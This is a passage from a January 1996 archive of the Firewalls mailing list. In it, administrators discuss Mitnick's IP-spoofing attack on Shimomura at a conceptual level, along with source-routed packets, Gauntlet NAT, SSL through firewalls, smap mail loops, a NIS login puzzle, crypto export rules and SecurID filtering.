-0600 (CST) From: Ron DuFresne To: Scott_Rickard@mc.xerox.com cc: firewalls@GreatCircle.COM, brain21@montag33.residence.gatech.edu, John Young , Frank Willoughby Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG In-Reply-To: <"<7124F430819C2976>7124F430819C2976@x-mc-xrx2-ms3.xerox"@-SMF-> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Scott, In otherwords you're saying that Mitnick was 'invited' in, bordering on entrapment... Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Wed Jan 10 17:41:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA16631 for firewalls-outgoing; Wed, 10 Jan 1996 17:04:16 -0800 (PST) Received: from crystal.nli-research.co.jp (crystal.nli-research.co.jp [202.248.71.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA16626 for ; Wed, 10 Jan 1996 17:04:09 -0800 (PST) Received: from oakland.ri.nli-research.co.jp (oakland [202.48.5.21]) by crystal.nli-research.co.jp (8.6.12+2.4W/3.3W9-nli-research) with ESMTP id KAA05741; Thu, 11 Jan 1996 10:00:30 +0900 Received: from chicago.ri.nli-research.co.jp (chicago.ri.nli-research.co.jp [202.48.4.5]) by oakland.ri.nli-research.co.jp (8.6.12+2.4W/3.3W9-nli-research) with ESMTP id KAA07233; Thu, 11 Jan 1996 10:01:04 +0900 Received: from ccmail.nli-research.co.jp (ccmail [202.48.4.200]) by chicago.ri.nli-research.co.jp (8.6.12+2.4W/3.4Wbeta6-nlri_email_server) with SMTP id JAA18570; Thu, 11 Jan 1996 09:59:12 +0900 Received: from cc:Mail SMTPLINK 2.1 by ccmail.nli-research.co.jp id AA821383799; Thu, 11 Jan 96 09:50:43 JST Date: Thu, 11 Jan 96 09:50:43 JST From: "wang" Message-Id: <9601118213.AA821383799@ccmail.nli-research.co.jp> To: a01056@eps.ua.es Cc: Firewalls@GreatCircle.COM Subject: I cannot read your mail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk JOSE LUIS VERDEGUER NAVARRO, I have received 3 pieces of your mails since yesterday, but they have only the mail header. So I cannot read the contents and I do not know why. I use cc:Mail and I suppose it's due to MIME or something else. In your mail header, > Mime-Version: 1.0 > Content-Type: TEXT/PLAIN; CHARSET=US=ASCII I do not know if the others you send mail to can read the contents Regards, Wang, Qin From firewalls-owner Wed Jan 10 17:43:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA16559 for firewalls-outgoing; Wed, 10 Jan 1996 17:01:26 -0800 (PST) Received: from border.dreamworks.com (dreamworks.com [204.250.57.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA16554 for ; Wed, 10 Jan 1996 17:01:22 -0800 (PST) Received: from border.dreamworks.com (daemon@localhost) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id QAA21211 for ; Wed, 10 Jan 1996 16:47:33 -0800 Received: from gateway (gateway.dreamworks.com [10.1.1.2]) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id QAA21206 for ; Wed, 10 Jan 1996 16:47:30 -0800 Received: from juice.dreamworks.com by gateway (SMI-8.6/SMI-SVR4) id RAA19466; Wed, 10 Jan 1996 17:00:01 -0800 Received: by juice.dreamworks.com (940816.SGI.8.6.9/940406.SGI.AUTO) for firewalls@greatcircle.com id RAA01752; Wed, 10 Jan 1996 17:02:45 -0800 From: "Alan C.Horn" Message-Id: <9601101702.ZM1750@juice.dreamworks.com> Date: Wed, 10 Jan 1996 17:02:43 -0800 X-Mailer: Z-Mail (3.2.2 10apr95 MediaMail) To: firewalls@greatcircle.com Subject: Encryption export laws from US.. Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know this is slightly off topic for this list, but I thought maybe somebody would know. Apologies in advance to anyone who didn't want to read this. I'm looking for some information on the current US restrictions on Import/Export of encrypted data, using something like PGP. If anyone has any pointers towards some sources, it would be tremendously helpful. Many thanks for your time. Al -- "It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred and sixty three elephants, fifty carts of forage, the monsoon's about to break and we're wearing ... we're wearing ... sort of things, like glass, only dark... dark glass things on our eyes..." - Terry Pratchett "Moving Pictures". Alan Horn - Computer Support and Sysadmin - Dreamworks SKG. (+1 818 733 6000) [Personal Email : deorth@mono.org] [Work Email : ahorn@dreamworks.com] From firewalls-owner Wed Jan 10 17:54:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA11525 for firewalls-outgoing; Wed, 10 Jan 1996 14:52:12 -0800 (PST) Received: from fastlane.net (fastlane.net [204.251.16.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA11518 for ; Wed, 10 Jan 1996 14:51:43 -0800 (PST) Received: (from lacoursj@localhost) by fastlane.net (8.6.8/8.6.6) id RAA01540; Wed, 10 Jan 1996 17:45:48 -0600 Date: Wed, 10 Jan 1996 17:45:48 -0600 (CST) From: "Jeffrey D. LaCoursiere" To: Brain21 cc: Neil , firewalls@GreatCircle.COM Subject: Re: Source Routed Packets In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [excellent quasi-tutorial deleted] I am fairly certain that Wellfleet allows you to do this, if you consider a Wellfleet configured with filters a firewall... j > > What firewalls *WILL* allow you to filter on bit sequences like I > illustrated above??? When I asked this last time the only answer that I > got was that V-One will allow you to do this to create your own, more > specific rules. Is that possible? Does only *ONE* vendor support this? > > Thanks, > > Brain21 > From firewalls-owner Wed Jan 10 17:56:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA07375 for firewalls-outgoing; Wed, 10 Jan 1996 12:07:40 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA05781 for ; Wed, 10 Jan 1996 11:36:41 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id AAA21693; Wed, 10 Jan 1996 00:26:58 -0800 Received: from saul2.u.washington.edu(140.142.56.21) by mycroft via smap (V1.3mjr) id sma021685; Wed Jan 10 00:26:51 1996 Received: by saul2.u.washington.edu (5.65+UW95.12/UW-NDC Revision: 2.33 ) id AA05695; Wed, 10 Jan 96 00:28:42 -0800 X-Sender: cabralje@saul2.u.washington.edu Date: Wed, 10 Jan 1996 00:28:42 -0800 (PST) From: James Cabral To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #6 In-Reply-To: <199601050757.XAA28538@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am interested to hear from anyone who has implemented Network Address Translation with TIS Gauntlet firewall. In particular, did you encounter any difficulties with this configuration? Are there any advantages/disadvantages to Gauntlet in regard to address translation? Thanks, Jim Cabral Jim Cabral 7712 Corliss Ave N, Seattle, WA 98103 Puget Technology Group Inc., Systems Engineer, Voice/Pager/Fax 206/525-1242 Univ. of Washington, 206/543-1017 From firewalls-owner Wed Jan 10 17:57:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA03182 for firewalls-outgoing; Wed, 10 Jan 1996 11:06:58 -0800 (PST) Received: from pimaia2w.prodigy.com (pimaia2w.prodigy.com [192.207.105.46]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA03177 for ; Wed, 10 Jan 1996 11:06:55 -0800 (PST) Received: from mailinb1.prodigy.com (tinahost [199.4.137.91]) by pimaia2w.prodigy.com (8.6.10/8.6.9) with SMTP id OAA38878 for ; Wed, 10 Jan 1996 14:05:30 -0500 Date: Wed, 10 Jan 1996 14:05:00 EST From: HFDK41A@prodigy.com (MR. JOHN K MOLNAR) X-Mailer: PRODIGY Services Company Internet mailer [PIM 3.2-334.50] Message-Id: <091.08356360.HFDK41A@prodigy.com> To: firewalls@Greatcircle.com Subject: Mergent Gauntlet? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi I got a fax this morning from Mergent, offering to sell me their Gauntlet Firewall??? What's a Gauntlet if it's not from TIS? Or is this the same stuff?? Confused. Thanks, -John Molnar From firewalls-owner Wed Jan 10 17:59:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA07059 for firewalls-outgoing; Wed, 10 Jan 1996 12:00:37 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA07046 for ; Wed, 10 Jan 1996 12:00:19 -0800 (PST) Received: from gmap-gw.leeds.ac.uk by relay4.UU.NET with ESMTP id QQzxyl10037; Wed, 10 Jan 1996 14:55:54 -0500 (EST) Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.7.3/8.6.9) with SMTP id TAA16402 for ; Wed, 10 Jan 1996 19:44:41 GMT Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id TAA05024 for ; Wed, 10 Jan 1996 19:44:44 GMT From: Danny Cox Date: Wed, 10 Jan 1996 19:45:06 GMT Message-Id: <27217.9601101945@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: Firewall design - routers and commercial kit X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Wed, 10 Jan 1996 10:30:51 -0800 (PST) Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma003257; Wed Jan 10 13:29:37 1996 Posted-Date: Wed, 10 Jan 1996 13:29:36 -0500 From: "Bryan D. Boyle" Message-Id: <9601101329.ZM5477@maverick.erenj.com> Date: Wed, 10 Jan 1996 13:29:36 -0500 In-Reply-To: "Marcus J. Ranum" "Re: http-gw with authentication" (Jan 10, 12:59pm) References: <199601101759.MAA08450@switchblade.v-one.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: firewalls@greatcircle.com Subject: Re: http-gw with authentication Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 10 January 96, mjr abused small electrons by stating: > > [* how such a nightmare bodge of a protocol has been chosen > to be the vehicle for "electronic commerce" is a subject worth > a periodic boggle] Nah, on a periodic scan, perhaps, it is the 1990's proof of Gresham's Law. -- Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 #include | http://www.access.digex.net/~bdboyle/index.html "It is only the ignorant who suppose themselves omniscient." --General Robert Edward Lee-- From firewalls-owner Wed Jan 10 18:02:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA06965 for firewalls-outgoing; Wed, 10 Jan 1996 11:59:22 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA06842 for ; Wed, 10 Jan 1996 11:58:37 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id CAA22996; Wed, 10 Jan 1996 02:55:15 -0800 Received: from haddock.demon.co.uk(158.152.16.191) by mycroft via smap (V1.3mjr) id sma022992; Wed Jan 10 02:54:48 1996 Received: from haddock.saa-cons.co.uk by smtpgate.saa-cons.co.uk with SMTP (5.65/1.3-eef) id AA11069; Wed, 10 Jan 96 11:00:47 GMT Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) id AA42344; Wed, 10 Jan 1996 11:00:46 GMT Date: Wed, 10 Jan 1996 11:00:39 +0000 (GMT) From: Dave Roberts To: firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Brain21 wrote: > Why did he not use TCPWrappers to prevent spoofing? I did't think that TCPWrapper was up to this. It can only do so much, which I believe is preventing source-routed packets, by disabling the socket option (according to the manual). If Mitnick was constructing his own IP packets (and I'm presuming he was), then he would have inserted the source address of the trusted host. Source routing would not have needed to be used. Your questions of why, are far too philisphosical for someone like me to have the pleasure to indulge in. :) -- Dave Roberts, Unix Systems Administrator, SAA Consultants Ltd, Plymouth, UK. "smap has the advantage [over bare sendmail] that it was written by somone who is almost certifiably paranoid" - Brent Chapman, London, 19 Oct 95. From firewalls-owner Wed Jan 10 18:04:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA06976 for firewalls-outgoing; Wed, 10 Jan 1996 11:59:31 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA06849 for ; Wed, 10 Jan 1996 11:58:39 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id BAA22424; Wed, 10 Jan 1996 01:59:12 -0800 Received: from mail1.digital.com(204.123.2.50) by mycroft via smap (V1.3mjr) id sma022421; Wed Jan 10 01:58:37 1996 Received: from ilosrv.ilo.dec.com by mail1.digital.com; (5.65 EXP 4/12/95 for V3.2/1.0/WV) id AA20125; Wed, 10 Jan 1996 01:54:30 -0800 Received: from ilofrs.ilo.dec.com by ilosrv.ilo.dec.com; (5.65/1.1.8.2/12Nov94-8.2MPM) id AA17451; Wed, 10 Jan 1996 09:53:56 GMT Received: by fwsrtr.fws.ilo.dec.com; (5.65/1.3/10May95) id AA01653; Wed, 10 Jan 1996 09:56:47 GMT Received: from karpov.fws.ilo.dec.com by hubba.fws.ilo.dec.com; (5.65/1.1.8.2/21Aug95-8.2MPM) id AA26262; Wed, 10 Jan 1996 09:55:12 GMT Organization: Digital Firewall Engineering Received: by karpov.fws.ilo.dec.com; (5.65v3.2/1.1.8.2/18Aug95-0213PM) id AA23434; Wed, 10 Jan 1996 09:53:55 GMT From: Dermot Tynan Message-Id: <9601100953.AA23434@karpov.fws.ilo.dec.com> Subject: Re: smap/smapd question To: tldb@eci-esyst.com (Tim Darnauer) Date: Wed, 10 Jan 1996 09:53:54 +0000 (GMT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Tim Darnauer" at Jan 9, 96 04:12:06 pm Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Tim Darnauer wrote: > > Does anyone know how or why smap, smapd, and sendmail are doing this? > Obviously I have a problem with my configuration but I've run out of > ideas. You don't provide a lot of details, but surmising, I'd say look at your MX records as seen at the originating host, and study the "Received:" headers to see who is getting the mail. Mail loops can often come about because the originating host thinks machine A has the cheapest MX (outside of the target), whereas machine A thinks machine B is cheapest, and machine B thinks machine A is cheapest, etc. - Der PS: Sorry for posting to the group at large, but I don't know if Tim Darnauer can receive mail... :) -- Dermot Tynan +353 91 754608 dtynan@ilo.dec.com DTN: 822-4608 Digital Equipment International BV, Galway, Ireland From firewalls-owner Wed Jan 10 18:06:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA03041 for firewalls-outgoing; Wed, 10 Jan 1996 11:00:21 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA03029 for ; Wed, 10 Jan 1996 11:00:10 -0800 (PST) Received: from gateway.deere.com by relay6.UU.NET with SMTP id QQzxyh03531; Wed, 10 Jan 1996 13:59:11 -0500 (EST) Received: by gateway.deere.com; id MAA10566; Wed, 10 Jan 1996 12:59:03 -0600 Received: from deere.com(192.43.1.3) by gateway.deere.com via smap (g3.0.1) id xma010524; Wed, 10 Jan 96 12:58:56 -0600 Received: from ci.deere.com (dts.90.deere.com) by deere.dx.deere.com (4.1/SMI-4.0) id AA18670; Wed, 10 Jan 96 12:59:01 CST Received: from dilligas.cam by ci.deere.com (4.1/SMI-4.0) id AA09343; Wed, 10 Jan 96 12:59:23 CST Date: Wed, 10 Jan 96 12:59:23 CST From: pf26376@ci.deere.com (Paul A. Fisher) Message-Id: <9601101859.AA09343@ci.deere.com> To: firewalls@greatcircle.com Subject: Allow SSL through a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Allow SSL through a firewall? I would like to allow access from the Internet to a WWW server that would have access to our corporate data. Because of the security implications, I would like that WWW server to be behind a firewall. I have tried to outline my design below and I would appreciate any comments about possible problems I may be opening myself up for. ************ ! client------* Internet *------Firewall---!---WWWserver ************ ! Internal Network The firewall would 'plug' (*not* proxy) port 443 inbound to the WWWserver. The WWWserver would run Netscape's Commerce server and use SSL to encrypt the entire session (non-SSL connections would be rejected). At that point we would have an encrypted session between the client and server that can pass whatever is necessary for the application (including userid's and passwords?). The purpose of 'plugging' port 443 through the firewall is the WWWserver would be behind the firewall and thus not be subject to attack using other services (telnet, sendmail, etc.). The http server would have to be secured against outside attack, but not the entire machine. Also, this allows the applications running on the WWWserver to have access to all of the internal data servers without having to find their way through the firewall. There are still some questions that we need to answer from an application standpoint: Is SSL encryption 'strong' enough for our purposes? Does the 'magic cookie' in the client present a problem? But from a network security standpoint, we shouldn't have a problem. Does anyone see any other problems with this proposed configuration? TIA, Paul Paul A. Fisher paulf@ci.deere.com Deere & Company, W3LSW ...uunet!deere!paulf John Deere Road (309) 765-4547 Moline, Illinois 61265 (309) 765-5242 FAX From firewalls-owner Wed Jan 10 18:08:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA06848 for firewalls-outgoing; Wed, 10 Jan 1996 11:58:40 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA06623 for ; Wed, 10 Jan 1996 11:58:01 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id BAA21987; Wed, 10 Jan 1996 01:11:07 -0800 Received: from relay.iunet.it(192.106.1.2) by mycroft via smap (V1.3mjr) id sma021983; Wed Jan 10 01:10:09 1996 Received: from etf.UUCP by relay.iunet.it with UUCP id AA02550 (5.65c8/IDA-1.4.4 for firewalls@greatcircle.com); Wed, 10 Jan 1996 09:56:34 +0100 Received: from cc:Mail by etf.etf.it id AA821296054 Wed, 10 Jan 96 09:47:34 Date: Wed, 10 Jan 96 09:47:34 From: "RDA" Message-Id: <9600108212.AA821296054@etf.etf.it> To: firewalls@greatcircle.com Subject: RE: firewalls reviews/comparisons Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ______________________________ Forward Header __________________________________ Subject: RE: firewalls reviews/comparisons Author: Neil at INTERNET Date: 1/9/96 3:41 PM >> 2) I've been searching for information on the best firewall to purchase >for > our >> needs and have not come across any reviews/comparisons on which is >> best (I have a list of all of the firewalls available and their >descriptions > but >> not any comparisons). Anyone know of any reviews and where to find >them? > We require a firewall which would could support a very high >throughput so > we would probably require a hardware-based firewall. >Configuring our >> front-end router to act as a firewall isn't a practical option. >Any > information would be >> appreciated. Thanks, >There was a review of commercial firewalls in (I think) Byte or something >like that a little while ago, the machines being the TIS Gauntlet, Border >Ware and Firewall 1. Perhaps someone with a better memory than me can >clarify. >> Brian Hescock >> hescockb@86aw4.ramstein.af.mil Hello, just for info, the Byte issue mentioned is from April '95 under the 'Network security' section. As a newbie myself, I found it quite useful. I'm hoping to set up a firewall based on NT 3.51 which will also act as a WWW proxy. Does anyone have any inside info on the expected release/functionalities of the Microsoft Catapult package ? Since most of the clients on the net I need to protect are running IPX (some run both IPX and TCP/IP), I would like to know the opinion of the experts on the possibility of a Web proxy machine also doing a 'protocol conversion'. i.e. surely it's theoretically possible for the WWW clients on the protected net to connect to the proxy over IPX (or Netbeui) and for the proxy to go out of a second card on TCP/IP to the Internet ??? I would imagine that blocking all TCP/IP through the firewall in this way would go a long way to protecting sensitive UNIX hosts on the inside. Has this been done before ? Am I seriously misguided ? Thanks for any opinions. Richard Anstey. ============================================================================= ======== E-mail messages from the European Training Foundation ========= ======== shall not in any way be legally binding. ========= ============================================================================= From firewalls-owner Wed Jan 10 18:15:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA05198 for firewalls-outgoing; Wed, 10 Jan 1996 11:31:42 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA04912 for ; Wed, 10 Jan 1996 11:29:55 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id DAA23326; Wed, 10 Jan 1996 03:56:20 -0800 Message-Id: <199601101156.DAA23326@mycroft.GreatCircle.COM> Received: from kuma.ciens.ucv.ve(150.185.72.83) by mycroft via smap (V1.3mjr) id sma023320; Wed Jan 10 03:55:33 1996 Received: by kuma.ciens.ucv.ve (1.37.109.4/16.2) id AA03885; Wed, 10 Jan 96 07:56:27 -0430 From: Carolina Elortegui Subject: SunOS, NIS and some intruder To: Firewalls@GreatCircle.COM Date: Wed, 10 Jan 96 7:56:26 SAT Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I just want some help understanding a fact happens here on friday. I'm the sysadmin in a lab with 4 HP and 2 Suns. I have work a lot with the HP, but almost never with the Suns, because there was another person that did it. This person let the lab, and now I have to learn about SunOS and BSD-like UNIX. There is a NIS server lets call it "A" and there is a NIS client lets call it "B". On thursday I delete a user from both systems, because we don't want him to access our net. On friday I found that the "user" I deleted the day before, accesed "B", and he has no login in the /etc/passwd; /etc/group, etc. I was looking with the last command what did happened, and I saw that the user accesed plenty times machine "B" that day. I am really new in sysadmin labors in the Sun machines, I really know HP-UX. Maybe there is something I don't know is happening with the NIS service and something about the Yellow Pages service. I have to tell you that the person that was here before me, just let the Suns like there where. I don't know what did they do there, I am knowing it rigth now. Thanks for helping me -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Carolina Elortegui Laboratorio de Postgrado Universidad Central de Venezuela Administrador Facultad de Ciencias Escuela de Computacion E-mail: celort@kuma.ciens.ucv.ve ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Wed Jan 10 18:44:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18482 for firewalls-outgoing; Wed, 10 Jan 1996 18:23:35 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18477 for ; Wed, 10 Jan 1996 18:23:31 -0800 (PST) Date: Wed, 10 Jan 1996 21:22:28 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960110212228.20200c26@hobbes.orl.mmc.com> Subject: re: Encryption export lawz from US Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Al rites: >I'm looking for some information on the current US restrictions on >Import/Export of encrypted data, using something like PGP. If anyone has any >pointers towards some sources, it would be tremendously helpful. Since the import/export of encrypted data/messages have no US restrictions, I doubt that you will find any. ITAR (International Trade in Arms Regulation) covers cryptographic devices and analysis tools e.g. what you need to *create* or break a cryptographic message (as I read it a decrypt-only engine is not covered -your milage may vary). Warmly, Padgett From firewalls-owner Wed Jan 10 18:49:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18511 for firewalls-outgoing; Wed, 10 Jan 1996 18:24:35 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18506 for ; Wed, 10 Jan 1996 18:24:31 -0800 (PST) Received: from pferguso-pc.cisco.com (c2robo13.cisco.com [171.68.13.39]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id SAA29907; Wed, 10 Jan 1996 18:22:56 -0800 Message-Id: <199601110222.SAA29907@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 Jan 1996 21:23:26 -0500 To: "Alan C.Horn" From: Paul Ferguson Subject: Re: Encryption export laws from US.. Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You may want to redirect this request to the cypherpunks mailing list instead, where you have a more on-topic audience. - paul At 05:02 PM 1/10/96 -0800, Alan C.Horn wrote: > >I know this is slightly off topic for this list, but I thought maybe somebody >would know. Apologies in advance to anyone who didn't want to read this. > >I'm looking for some information on the current US restrictions on >Import/Export of encrypted data, using something like PGP. If anyone has any >pointers towards some sources, it would be tremendously helpful. > >Many thanks for your time. > >Al > > > >-- >"It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred >and sixty three elephants, fifty carts of forage, the monsoon's about to break >and we're wearing ... we're wearing ... sort of things, like glass, only dark... >dark glass things on our eyes..." > - Terry Pratchett "Moving Pictures". > >Alan Horn - Computer Support and Sysadmin - Dreamworks SKG. (+1 818 733 6000) > [Personal Email : deorth@mono.org] [Work Email : ahorn@dreamworks.com] > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 10 19:06:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA17914 for firewalls-outgoing; Wed, 10 Jan 1996 18:09:29 -0800 (PST) Received: from stilton.cisco.com (stilton.cisco.com [171.69.1.161]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA17857 for ; Wed, 10 Jan 1996 18:09:03 -0800 (PST) Received: from cisco.com (localhost.cisco.com [127.0.0.1]) by stilton.cisco.com (8.6.8+c/8.6.5) with ESMTP id SAA13168; Wed, 10 Jan 1996 18:07:36 -0800 Message-Id: <199601110207.SAA13168@stilton.cisco.com> To: nicholscs@agedwards.com (Nichols,Christopher) Cc: firewalls@GreatCircle.COM Subject: Re: SecureID In-Reply-To: Your message of "Wed, 10 Jan 1996 08:00:29 CST." <1996Jan10.075400.1093.22480@igate.agedwards.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Id: <13165.821326055.1@cisco.com> Date: Wed, 10 Jan 1996 18:07:36 -0800 From: David Carrel Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If the cisco is the authentication point, then you will need to use TACACS or TACACS+ to utilize the SecureID token card. Then run the TACACS or TACACS+ server on box D. Alternatively you could run the TACACS or TACACS+ server on B and run the SDI protocol from there to D. Definitely TACACS+ is prefered since it is encrypted and supports the resynchronization that the SecureID cards need every now and then. I'd venture that placing the server on B is less secure, but that's hard to say for sure without a clear picture of your topology. Dave > I am investigating the use of Security Dynamics ACE Servers and SecurID > tokens and have a question concerning packet filtering and the passing of > the SDI packets through our net. > > Given the design: > > A (Cisco)-----External Segment-----B(HP > Box)----------C(Cisco)----------D(Internal Net) > > A - external router and authentication point > B - HP Box where App for users on external segment resides (routing is off) > C - Screening Filter/Firewall > D - Internal Net where ACE Server would reside > > Since the design may exist in muliple sites, we plan to use strong filtering > between the HP box (B) and the Internal Net (D). We are also considering a > commercial firewall at C. My understanding is that the SDI authentication > process uses dynamically assigned port numbers (udp) > 1024. That would > require us to open all ports > 1024 at point C so that SDI could pass from A > to D. This is not desirable. > > 1) With routing off at B does anyone know of an existing proxy to pass the > SDI packets across from A to C? or has anyone written one? > 2) How can we setup an effective firewall at C without having to open all > ports > 1024 and still allow the SDI authentication process to pass? > > One suggestion was to use TACACS. Any thoughts? > > Chris > > > > From firewalls-owner Wed Jan 10 19:29:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19166 for firewalls-outgoing; Wed, 10 Jan 1996 18:36:48 -0800 (PST) Received: from switchblade.v-one.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA19144 for ; Wed, 10 Jan 1996 18:36:40 -0800 (PST) Received: (from mjr@localhost) by switchblade.v-one.com (8.6.9/8.6.9) id VAA09986 for 